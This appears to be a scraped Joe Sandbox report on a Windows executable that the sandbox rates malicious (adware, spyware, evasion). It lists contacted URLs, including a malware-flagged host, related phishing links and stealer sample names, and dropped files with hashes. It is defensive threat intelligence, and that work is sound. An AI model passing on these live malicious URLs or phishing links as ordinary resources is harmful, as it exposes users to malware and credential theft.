                                                                                                                                                                          https://assets.msn.com/staticsb/statics/pr-3693935/IE11NTP/desktop-shape.pngMCnv8401986_110422.exe, 00000000.00000002.3284974365.000000000B0B5000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                            		high
                                                                                                                                                                            https://c.msn.com/Knv8401986_110422.exe, 00000000.00000002.3280405240.0000000006B6A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                              		high
                                                                                                                                                                              https://www.msn.nv8401986_110422.exe, 00000000.00000002.3295256133.000000000CAB5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                                                              		unknown
                                                                                                                                                                              https://www.msn.com/?ocid=iehphttps://www.msn.com/?ocid=iehpnv8401986_110422.exe, 00000000.00000002.3285524155.000000000B3C3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                                		high
                                                                                                                                                                                http://w.nanweng.cn:80/qy/lqnrps0sid360softtm1689880905type20uid102e1490f0604c078f675cf9899bc6e6ver6nv8401986_110422.exe, 00000000.00000002.3276474159.00000000040EF000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                • Avira URL Cloud: malware
                                                                                                                                                                                		unknown
                                                                                                                                                                                https://drive-autopush.corp.google.com/nv8401986_110422.exe, 00000000.00000003.2016283703.000000000082B000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                  		high
                                                                                                                                                                                  https://www.msn.com/fr-ch/actualite/other/Mentions-lnv8401986_110422.exe, 00000000.00000002.3296835768.000000000CCA6000.00000004.00000800.00020000.00000000.sdmp, nv8401986_110422.exe, 00000000.00000002.3285360334.000000000B130000.00000004.00000020.00020000.00000000.sdmp, experience.b374b0d5b40196862f17[1].js.0.drfalse
                                                                                                                                                                                    		high

                                                                                                                                                                                    World Map of Contacted IPs

                                                                                                                                                                                    • No. of IPs < 25%
                                                                                                                                                                                    • 25% < No. of IPs < 50%
                                                                                                                                                                                    • 50% < No. of IPs < 75%
                                                                                                                                                                                    • 75% < No. of IPs

                                                                                                                                                                                    Public IPs

                                                                                                                                                                                    IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                    47.103.45.17
                                                                                                                                                                                    		w.nanweng.cnChina
                                                                                                                                                                                    		37963CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtdfalse
                                                                                                                                                                                    18.244.18.122
                                                                                                                                                                                    		sb.scorecardresearch.comUnited States
                                                                                                                                                                                    		16509AMAZON-02USfalse
                                                                                                                                                                                    151.101.194.137
                                                                                                                                                                                    		code.jquery.comUnited States
                                                                                                                                                                                    		54113FASTLYUSfalse

                                                                                                                                                                                    General Information

                                                                                                                                                                                    Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                                                    Analysis ID:1583791
                                                                                                                                                                                    Start date and time:2025-01-03 15:25:05 +01:00
                                                                                                                                                                                    Joe Sandbox product:CloudBasic
                                                                                                                                                                                    Overall analysis duration:0h 6m 12s
                                                                                                                                                                                    Hypervisor based Inspection enabled:false
                                                                                                                                                                                    Report type:full
                                                                                                                                                                                    Cookbook file name:default.jbs
                                                                                                                                                                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                                    Number of analysed new started processes analysed:5
                                                                                                                                                                                    Number of new started drivers analysed:0
                                                                                                                                                                                    Number of existing processes analysed:0
                                                                                                                                                                                    Number of existing drivers analysed:0
                                                                                                                                                                                    Number of injected processes analysed:0
                                                                                                                                                                                    Technologies:
                                                                                                                                                                                    • HCA enabled
                                                                                                                                                                                    • EGA enabled
                                                                                                                                                                                    • AMSI enabled
                                                                                                                                                                                    Analysis Mode:default
                                                                                                                                                                                    Analysis stop reason:Timeout
                                                                                                                                                                                    Sample name:nv8401986_110422.exe
                                                                                                                                                                                    Detection:MAL
                                                                                                                                                                                    Classification:mal100.adwa.spyw.evad.winEXE@1/81@12/3
                                                                                                                                                                                    EGA Information:
                                                                                                                                                                                    • Successful, ratio: 100%
                                                                                                                                                                                    HCA Information:
                                                                                                                                                                                    • Successful, ratio: 92%
                                                                                                                                                                                    • Number of executed functions: 729
                                                                                                                                                                                    • Number of non-executed functions: 52
                                                                                                                                                                                    Cookbook Comments:
                                                                                                                                                                                    • Found application associated with file extension: .exe

                                                                                                                                                                                    Warnings

                                                                                                                                                                                    • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, svchost.exe
                                                                                                                                                                                    • Excluded IPs from analysis (whitelisted): 23.56.254.14, 2.23.227.208, 2.23.227.215, 2.23.227.221, 204.79.197.203, 2.23.209.23, 2.23.209.15, 2.23.209.12, 2.23.209.13, 2.23.209.20, 2.23.209.17, 2.23.209.21, 2.23.209.16, 2.23.209.19, 13.74.129.1, 20.50.80.213, 13.107.21.237, 204.79.197.237, 40.126.32.134, 20.190.160.17, 40.126.32.74, 20.190.160.22, 20.190.160.14, 40.126.32.136, 40.126.32.68, 40.126.32.133, 2.18.64.8, 2.18.64.22, 52.140.48.131, 204.79.197.222, 184.28.90.27, 52.149.20.212, 13.107.246.45, 20.109.210.53
                                                                                                                                                                                    • Excluded domains from analysis (whitelisted): fp.msedge.net, slscr.update.microsoft.com, c-msn-com-nsatc.trafficmanager.net, p-static.bing.trafficmanager.net, ak.privatelink.msidentity.com, e11290.dspg.akamaiedge.net, a-0019.a-msedge.net, go.microsoft.com, e86303.dscx.akamaiedge.net, ocsp.digicert.com, www.bing.com.edgekey.net, ma1prdapp01-canary.southindia.cloudapp.azure.com, r.bing.com, a-0019.standard.a-msedge.net, a4.bing.com, 1.perf.msedge.net, login.mso.msidentity.com, e28578.d.akamaiedge.net, akam.bing.com, www.bing.com, assets.msn.com.edgekey.net, fs.microsoft.com, otelrules.azureedge.net, c-bing-com.dual-a-0034.a-msedge.net, r.bing.com.edgekey.net, www.tm.ak.prd.aadg.akadns.net, a-0003.a-msedge.net, onedscolprdneu08.northeurope.cloudapp.azure.com, ctldl.windowsupdate.com, www-msn-com.a-0003.a-msedge.net, www-www.bing.com.trafficmanager.net, fe3cr.delivery.mp.microsoft.com, c.bing.com, go.microsoft.com.edgekey.net, dual-a-0034.a-msedge.net, akam.bing.com.edgekey.net, global.asimov.events.data.trafficm
                                                                                                                                                                                    • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                                                                                    • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                                                                                                                    • Report size getting too big, too many NtDeviceIoControlFile calls found.
                                                                                                                                                                                    • Report size getting too big, too many NtEnumerateKey calls found.
                                                                                                                                                                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                                    • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                                                                                                                                                                    Simulations

                                                                                                                                                                                    Behavior and APIs

                                                                                                                                                                                    TimeTypeDescription
                                                                                                                                                                                    09:25:53API Interceptor50x Sleep call for process: nv8401986_110422.exe modified

                                                                                                                                                                                    Joe Sandbox View / Context

                                                                                                                                                                                    IPs

                                                                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                    47.103.45.17Reflective.dllGet hashmaliciousReflectiveLoaderBrowse
                                                                                                                                                                                    • w.nanweng.cn/qy/fb
                                                                                                                                                                                    18.244.18.122BHgwhz3lGN.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                      file.exeGet hashmaliciousPureCrypter, LummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, StealcBrowse
                                                                                                                                                                                        file.exeGet hashmaliciousPureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                          file.exeGet hashmaliciousLummaC, Amadey, Stealc, VidarBrowse
                                                                                                                                                                                            file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                                                                                                                                              file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                                                                                                                                                Launcher 1.0.0.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                  file.exeGet hashmaliciousPureCrypter, LummaC, Amadey, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                    Xeno Executor Setup 1.0.0.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                      file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                                                                                                                                                        151.101.194.137http://facebooksecurity.blogspot.dk/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                        • code.jquery.com/jquery-1.7.min.js
                                                                                                                                                                                                        http://soporte-store.info/icloud2022-esp.phpGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                        • code.jquery.com/jquery-1.11.3.min.js
                                                                                                                                                                                                        http://mi-outlook-loggin.click/icloud2022-esp.phpGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                        • code.jquery.com/jquery-1.11.3.min.js
                                                                                                                                                                                                        http://www.oodlesoftraffic.com/ec/JaneMarksHealth/1934/acmariix2/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                        • code.jquery.com/jquery-1.9.1.js
                                                                                                                                                                                                        http://facebooksecurity.blogspot.pe/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                        • code.jquery.com/jquery-1.7.min.js
                                                                                                                                                                                                        https://tracker.club-os.com/campaign/click?qDomYmsgId=d738c6bd137e6a03157c6c728cbc659e734fc398&test=false&target=demsaenlinea.mx/jahn/00987667839933/utilities@affordablecare.comGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                        • code.jquery.com/jquery-3.3.1.min.js

                                                                                                                                                                                                        Domains

                                                                                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                        code.jquery.comhttps://t.co/jNNzVU90SAGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                        • 151.101.2.137
                                                                                                                                                                                                        https://realpaperworks.com/wp-content/red/UhPIYaGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                        • 151.101.130.137
                                                                                                                                                                                                        https://share.hsforms.com/1ERkb7-8BRoi6cEFhMJVsvgt08okGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                        • 151.101.66.137
                                                                                                                                                                                                        https://www.ecorfan.org/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                        • 151.101.194.137
                                                                                                                                                                                                        https://bitl.to/3Y0BGet hashmaliciousCAPTCHA Scam ClickFixBrowse
                                                                                                                                                                                                        • 151.101.66.137
                                                                                                                                                                                                        01012025.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                        • 151.101.66.137
                                                                                                                                                                                                        25F.tmp.exeGet hashmaliciousDarkbotBrowse
                                                                                                                                                                                                        • 151.101.2.137
                                                                                                                                                                                                        https://bs32c.golfercaps.com/vfd23ced/#sean@virtualintelligencebriefing.comGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                        • 151.101.130.137
                                                                                                                                                                                                        https://N0.kolivane.ru/da4scmQ/#Memily.gamble@amd.comGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                        • 151.101.2.137
                                                                                                                                                                                                        EFT Payment_Transcript__Survitecgroup.htmlGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                        • 151.101.2.137
                                                                                                                                                                                                        w.nanweng.cnReflective.dllGet hashmaliciousReflectiveLoaderBrowse
                                                                                                                                                                                                        • 47.103.45.17
                                                                                                                                                                                                        SEMqjw.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                        • 47.102.38.15
                                                                                                                                                                                                        AdobeAcrobatProDC2021.005.20048#U4e2d#U6587#U76f4#U88c5#U7834#U89e3#U7248@2223_16081.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                        • 47.102.38.15
                                                                                                                                                                                                        sb.scorecardresearch.comover.ps1Get hashmaliciousVidarBrowse
                                                                                                                                                                                                        • 18.244.18.27
                                                                                                                                                                                                        6684V5n83w.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                        • 18.244.18.38
                                                                                                                                                                                                        25F.tmp.exeGet hashmaliciousDarkbotBrowse
                                                                                                                                                                                                        • 18.244.18.38
                                                                                                                                                                                                        BHgwhz3lGN.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                        • 18.244.18.122
                                                                                                                                                                                                        Tool_Unlock_v1.2.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                        • 18.161.69.30
                                                                                                                                                                                                        Hwacaj.exeGet hashmaliciousDarkbotBrowse
                                                                                                                                                                                                        • 18.161.69.8
                                                                                                                                                                                                        JA7cOAGHym.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                        • 18.161.69.117
                                                                                                                                                                                                        aD7D9fkpII.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                        • 18.165.220.110
                                                                                                                                                                                                        installer.batGet hashmaliciousVidarBrowse
                                                                                                                                                                                                        • 18.165.220.106
                                                                                                                                                                                                        skript.batGet hashmaliciousVidarBrowse
                                                                                                                                                                                                        • 18.165.220.66

                                                                                                                                                                                                        ASNs

                                                                                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                        CNNIC-ALIBABA-CN-NET-APHangzhouAlibabaAdvertisingCoLtd1.exeGet hashmaliciousMetasploit, MeterpreterBrowse
                                                                                                                                                                                                        • 8.130.94.218
                                                                                                                                                                                                        http://47.100.36.233:58765/template/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                        • 47.100.36.233
                                                                                                                                                                                                        DEMONS.spc.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                        • 139.252.21.15
                                                                                                                                                                                                        45631.exeGet hashmaliciousNitolBrowse
                                                                                                                                                                                                        • 39.103.20.59
                                                                                                                                                                                                        45631.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                        • 39.103.20.59
                                                                                                                                                                                                        Hilix.m68k.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                        • 8.155.218.222
                                                                                                                                                                                                        1735021454574.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                        • 120.78.149.238
                                                                                                                                                                                                        1734098836319.exeGet hashmaliciousBlackMoonBrowse
                                                                                                                                                                                                        • 39.103.20.61
                                                                                                                                                                                                        armv4l.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                        • 59.82.127.195
                                                                                                                                                                                                        AMAZON-02US154.216.18.23-boatnet.arm7-2025-01-03T11_41_00.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                        • 54.171.230.55
                                                                                                                                                                                                        http://www.klim.comGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                        • 3.64.24.94
                                                                                                                                                                                                        l3v0.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                        • 3.107.255.174
                                                                                                                                                                                                        1111.htaGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                        • 185.166.143.50
                                                                                                                                                                                                        https://d25mwe2145ri5.cloudfront.net/installer/33365003/2056290341532614624Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                        • 18.239.15.218
                                                                                                                                                                                                        Payment Receipt.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                        • 13.228.81.39
                                                                                                                                                                                                        boatnet.mpsl.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                        • 54.171.230.55
                                                                                                                                                                                                        sparc.elfGet hashmaliciousGafgyt, MiraiBrowse
                                                                                                                                                                                                        • 34.249.145.219
                                                                                                                                                                                                        powerpc.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                                        • 34.249.145.219
                                                                                                                                                                                                        x86.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                        • 34.249.145.219
                                                                                                                                                                                                        FASTLYUShttps://t.co/jNNzVU90SAGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                        • 151.101.2.137
                                                                                                                                                                                                        http://www.klim.comGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                        • 151.101.2.133
                                                                                                                                                                                                        ebjtOH70jl.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                        • 185.199.108.133
                                                                                                                                                                                                        http://4.nscqn.dashboradcortx.xyz/4hbVgI3060FFjU163rczgakrldw288HJUBSXEIQRWLNTA425583MYLP8076x12Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                        • 151.101.2.132
                                                                                                                                                                                                        mierda.txt.pyGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                        • 151.101.67.6
                                                                                                                                                                                                        http://hotelyetipokhara.comGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                        • 151.101.67.1
                                                                                                                                                                                                        https://realpaperworks.com/wp-content/red/UhPIYaGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                        • 151.101.194.137
                                                                                                                                                                                                        http://boir.orgGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                        • 151.101.2.133
                                                                                                                                                                                                        https://share.hsforms.com/1ERkb7-8BRoi6cEFhMJVsvgt08okGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                                        • 151.101.194.137
                                                                                                                                                                                                        https://ntta.org-pay-u5ch.sbs/us/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                        • 151.101.66.49

                                                                                                                                                                                                        JA3 Fingerprints

                                                                                                                                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                                        37f463bf4616ecd445d4a1937da06e19adguardInstaller.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                        • 18.244.18.122
                                                                                                                                                                                                        • 151.101.194.137
                                                                                                                                                                                                        adguardInstaller.exeGet hashmaliciousPureLog StealerBrowse
                                                                                                                                                                                                        • 18.244.18.122
                                                                                                                                                                                                        • 151.101.194.137
                                                                                                                                                                                                        RisingStrip.exeGet hashmaliciousVidarBrowse
                                                                                                                                                                                                        • 18.244.18.122
                                                                                                                                                                                                        • 151.101.194.137
                                                                                                                                                                                                        adguardVPNInstaller.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                        • 18.244.18.122
                                                                                                                                                                                                        • 151.101.194.137
                                                                                                                                                                                                        ebjtOH70jl.exeGet hashmaliciousLummaC, Amadey, Cryptbot, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                                                                                        • 18.244.18.122
                                                                                                                                                                                                        • 151.101.194.137
                                                                                                                                                                                                        Setup.msiGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                        • 18.244.18.122
                                                                                                                                                                                                        • 151.101.194.137
                                                                                                                                                                                                        Faxed_6761fa19c0f9d_293874738_EXPORT_SOA__REF2632737463773364_221PLW.exe.exeGet hashmaliciousRemcosBrowse
                                                                                                                                                                                                        • 18.244.18.122
                                                                                                                                                                                                        • 151.101.194.137
                                                                                                                                                                                                        file.exeGet hashmaliciousXRedBrowse
                                                                                                                                                                                                        • 18.244.18.122
                                                                                                                                                                                                        • 151.101.194.137
                                                                                                                                                                                                        file.exeGet hashmaliciousXRedBrowse
                                                                                                                                                                                                        • 18.244.18.122
                                                                                                                                                                                                        • 151.101.194.137
                                                                                                                                                                                                        file.exeGet hashmaliciousXRedBrowse
                                                                                                                                                                                                        • 18.244.18.122
                                                                                                                                                                                                        • 151.101.194.137

                                                                                                                                                                                                        Dropped Files

                                                                                                                                                                                                        No context

                                                                                                                                                                                                        Created / dropped Files

                                                                                                                                                                                                        C:\ProgramData\roundinfo.ini

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Users\user\Desktop\nv8401986_110422.exe
                                                                                                                                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):43
                                                                                                                                                                                                        Entropy (8bit):4.396853998737204
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3:OvyQnoSD4Vy:OKQnoSD4Vy
                                                                                                                                                                                                        MD5:38826EAD1C12921FFA502F4F0C540746
                                                                                                                                                                                                        SHA1:68B0C1B5FA6035E17459022565CAB4A3C1B2D72B
                                                                                                                                                                                                        SHA-256:577627FE50C90D9AFA863C2405B741AE79462F59E72F9928744EB031051C8B72
                                                                                                                                                                                                        SHA-512:321E1E69F647545A26B7268D463A17CBA3F1EFA8405B1C0DC1E1AF5C5A34A3A49CB0860CFC0F538E8BBEB6A197049BCCA1714FEC29B0B7E36DA364F489F9881F
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:[info]..time=2025-1-3..round=1..install=0..

                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Internet Explorer\DOMStore\UXDTP1YG\www.msn[1].xml

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Users\user\Desktop\nv8401986_110422.exe
                                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):127
                                                                                                                                                                                                        Entropy (8bit):4.975928782040279
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3:D9yRtFwsSxzqC+eAsOFETYHFk6rZFFCqTUDTyWLKb:JUF+FqCqdFFrFMDTXub
                                                                                                                                                                                                        MD5:8A5FFA326AADE4413DB37A2C29CF8496
                                                                                                                                                                                                        SHA1:D54CCDDC42468F8DBD628434294A68C319C69805
                                                                                                                                                                                                        SHA-256:233BAA509A6C309459494F8A77868E1CC3F1E5F96724D6809495EFADAD0E54F2
                                                                                                                                                                                                        SHA-512:D386E85CACAB6C2F75E0553051377EBBFEB296592C25B6ED99A84A56A61A6A857F95A2CF5D4D1E9FE6ECDF618DFD5433950AF7FC5F4B1A0ABDBCF8EB106422AB
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:low
                                                                                                                                                                                                        Preview:<root><item name="pageVersions" value="{&quot;hp&quot;:&quot;20241220.296&quot;}" ltime="1759250672" htime="31153643" /></root>

                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Internet Explorer\MSIMGSIZ.DAT

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Users\user\Desktop\nv8401986_110422.exe
                                                                                                                                                                                                        File Type:data
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):49120
                                                                                                                                                                                                        Entropy (8bit):0.0017331682157558962
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:3:Ztt:T
                                                                                                                                                                                                        MD5:0392ADA071EB68355BED625D8F9695F3
                                                                                                                                                                                                        SHA1:777253141235B6C6AC92E17E297A1482E82252CC
                                                                                                                                                                                                        SHA-256:B1313DD95EAF63F33F86F72F09E2ECD700D11159A8693210C37470FCB84038F7
                                                                                                                                                                                                        SHA-512:EF659EEFCAB16221783ECB258D19801A1FF063478698CF4FCE3C9F98059CA7B1D060B0449E6FD89D3B70439D9735FA1D50088568FF46C9927DE45808250AEC2E
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:high, very likely benign file
                                                                                                                                                                                                        Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\4L4QdyjTv0HYE2Ig2ol9eYoqxg8[1].svg

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Users\user\Desktop\nv8401986_110422.exe
                                                                                                                                                                                                        File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):1101
                                                                                                                                                                                                        Entropy (8bit):4.829151166001716
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:24:t0S8eLfl954T0u2y3EO1gRcDrIvQaDxijjfscC:vLfRWtPDuQKIjq
                                                                                                                                                                                                        MD5:91CD11CFCCA65CFACE96153268D71F63
                                                                                                                                                                                                        SHA1:E0BE107728D3BF41D8136220DA897D798A2AC60F
                                                                                                                                                                                                        SHA-256:8EE1E6D7A487C38412D7B375AC4A6BD7E47F70858055EEB7957226ADA05544BE
                                                                                                                                                                                                        SHA-512:4367CE147C7FA4590838F23C47819B8954858128336979E28BA116924B92660A7CBDC9A8292C45C5F26FF591F423F03DFADCB78A772DBE86AC5FBABF0B4E7711
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:moderate, very likely benign file
                                                                                                                                                                                                        Preview:<svg focusable="false" width="24px" height="24px" viewBox="0 0 24 24" version="1.1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink">.. <rect fill-opacity="0.2" fill="#000" x="0" y="0" width="24" height="24" rx="2"></rect>.. <g transform="translate(4, 4)">.. <path d="M13.2916881,1.29304814 L7.99395739,6.59077883 L2.69622669,1.29304814 C2.30349711,0.913737214 1.67923378,0.919161894 1.29315522,1.30524045 C0.907076669,1.691319 0.90165199,2.31558234 1.28096291,2.70831192 L6.57869361,8.00604261 L1.28096291,13.3037733 C0.90165199,13.6965029 0.907076669,14.3207662 1.29315522,14.7068448 C1.67923378,15.0929233 2.30349711,15.098348 2.69622669,14.7190371 L7.99395739,9.42130639 L13.2916881,14.7190371 C13.6844177,15.098348 14.308681,15.0929233 14.6947596,14.7068448 C15.0808381,14.3207662 15.0862628,13.6965029 14.7069519,13.3037733 L9.40922117,8.00604261 L14.7069519,2.70831192 C15.0976827,2.31746305 15.0976827,1.683897 14.7069519,1.29304814 C14.316103,0.902317288 13

                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\5WG_kDsbFabhsuv_6NwDoh2LdnI.gz[1].js

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Users\user\Desktop\nv8401986_110422.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (684), with no line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):684
                                                                                                                                                                                                        Entropy (8bit):5.166363591063823
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:12:2Q12lkSF3mVwl/BJWhuSpOYkM3+Pu1w2E1fNPrQ5uj5lD+QgAjTYCXPrQuN:2Q1QkSFr5BJupODpfPrQ8Dn/XPrQuN
                                                                                                                                                                                                        MD5:C1D04951E98B892931D4C2BC34555057
                                                                                                                                                                                                        SHA1:55E6297F3499B4961C8E956F7F088868CD59C769
                                                                                                                                                                                                        SHA-256:7C317940549467B3210D2F72DA000BAC3481ABFDE3AC5358D398EB64DCBC8532
                                                                                                                                                                                                        SHA-512:D427487C00AF5E8D9DB222F8A01521A5C8646AE8E459D517443DAC8EF2DBEC2DDEA91877B095B82CF3E52031E1650C7360811ED8A06E02F85E3517974D36AD96
                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                        Reputation:moderate, very likely benign file
                                                                                                                                                                                                        Preview:(function(){var n,i=(new Date).getTime(),t=_G!==undefined&&_G.RTO!==undefined?_G.RTO:null,r=((n=_G===null||_G===void 0?void 0:_G.EF)===null||n===void 0?void 0:n.infrefcflog)===1;t!=null&&(window.history.scrollRestoration="auto",document.addEventListener("visibilitychange",function(){if(document.visibilityState==="visible"&&window.location.href.indexOf("/search")>=0&&(new Date).getTime()-i>t&&(Log&&Log.Log&&Log.Log("NTRef","DayRefresh","Active"),!r)){var n=window.location.href+(window.location.href.indexOf("dayref=1")<0?"&dayref=1":"");window.location.href=n}}),typeof setTimeout!="undefined"&&setTimeout(function(){Log&&Log.Log&&Log.Log("NTRef","DayRefresh","Inactive")},t))})()

                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\66dJc2rUgPuuUEbsa_gjcd_o3GE.gz[1].css

                                                                                                                                                                                                        Download File
                                                                                                                                                                                                        Process:C:\Users\user\Desktop\nv8401986_110422.exe
                                                                                                                                                                                                        File Type:ASCII text, with very long lines (44213), with no line terminators
                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                        Size (bytes):44213
                                                                                                                                                                                                        Entropy (8bit):5.4731108865747
                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                        SSDEEP:768:j3K3FC6AwneAIzFn94868I8GuK6HoxT7TbIuw9bNL6rb:bn4t3DOoxL//
                                                                                                                                                                                                        MD5:E917BC77D3F53468F4A6C9D7AF562B04
                                                                                                                                                                                                        SHA1:197D47F29FF3DBB36A888941750195742E6B6FDB
                                                                                                                                                                                                        SHA-256:AB1A27D51C348A05766BF4ADCF53206A5CC77992246BF28ED15E2F9F6930928D
                                                                                                                                                                                                        SHA-512:200F358305578EE7F0B23F985AADD58EF507CD9AC07BCFC8DB7DDD7D48D2CCD1528B5C8B3A20A11DCAF951CAF84781E5A838BA0F5DF9C3C3D843F084FF2F7E94
                                                                                                                                                                                                        Malicious:false
